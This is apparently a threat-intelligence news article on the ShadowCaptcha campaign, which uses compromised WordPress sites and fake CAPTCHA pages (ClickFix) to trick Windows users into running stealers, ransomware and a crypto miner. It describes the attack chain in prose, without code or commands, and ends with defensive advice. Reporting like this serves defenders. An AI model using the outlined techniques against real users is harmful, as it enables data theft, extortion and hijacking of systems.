A large-scale cybercrime campaign, ShadowCaptcha, is leveraging social engineering and sophisticated delivery methods to infect users with a variety of malicious payloads. First observed in August 2025 by the Israel National Digital Agency, this campaign stands out for its clever use of compromised WordPress sites to initiate a multi-stage attack. The core of the operation involves tricking unsuspecting victims into interacting with fake CAPTCHA verification pages. By blending social engineering with living-off-the-land binaries (LOLBins), ShadowCaptcha can gain and maintain a stealthy foothold on targeted systems. The campaign’s ultimate goal is to collect sensitive data, deploy cryptocurrency miners for illicit profits, or unleash devastating ransomware.
The initial vector of the ShadowCaptcha campaign is a compromised WordPress website that has been injected with malicious JavaScript code. When a user visits one of these infected sites, they are redirected to a convincing, but fake, Cloudflare or Google CAPTCHA page. This is where the ClickFix social engineering tactic comes into play. The fake CAPTCHA page presents instructions designed to mislead users into performing a specific action that will execute the malicious code. These instructions can take one of two paths: either guiding the victim to use the Windows Run dialog or instructing them to save the page as an HTML Application (HTA) and then run it using a legitimate Windows tool, mshta.exe.
The attack chain’s payload delivery is particularly insidious, utilizing legitimate Windows binaries to bypass security defenses. When a user follows the instructions to use the Windows Run dialog, the command executes an MSI installer or a remotely hosted HTA file. This action delivers information stealers like Lumma and Rhadamanthys. Alternatively, if the victim is tricked into saving and executing the HTA payload, they are infected with the Epsilon Red ransomware. This technique, previously documented by CloudSEK, cleverly relies on the user to unknowingly execute the malware. In some cases, the attack automatically copies a malicious command to the user’s clipboard using JavaScript, hoping they will paste and run it without realizing its true nature.
Beyond data theft and ransomware, ShadowCaptcha also deploys cryptocurrency miners to generate profits for the attackers. The campaigns have been observed delivering a crypto miner based on XMRig. In a display of technical sophistication, some variants are configured to fetch mining parameters from a Pastebin URL, allowing the attackers to modify mining settings on the fly. To further enhance their mining efficiency, the attackers drop a vulnerable driver, “WinRing0x64.sys,” to gain kernel-level access. This allows them to interact directly with CPU registers, optimizing the mining process and maximizing their illicit gains. The use of anti-debugger techniques and DLL side-loading also helps the attackers evade detection and maintain persistence on infected systems.
The reach of the ShadowCaptcha campaign is global, with a majority of the infected WordPress sites located in Australia, Brazil, Italy, Canada, Colombia, and Israel. These compromised sites span various sectors, including technology, hospitality, legal/finance, healthcare, and real estate. While the exact method of initial compromise for these WordPress sites remains unconfirmed, researchers have high confidence that the attackers exploited known vulnerabilities in plugins or gained access using stolen credentials. To protect against this evolving threat, organizations and individuals must train users to recognize ClickFix campaigns, implement network segmentation to prevent lateral movement, and ensure all WordPress sites are secured with timely updates and multi-factor authentication (MFA). ShadowCaptcha is a stark reminder of how social engineering has evolved into a sophisticated, full-spectrum cyber operation.
Reference:
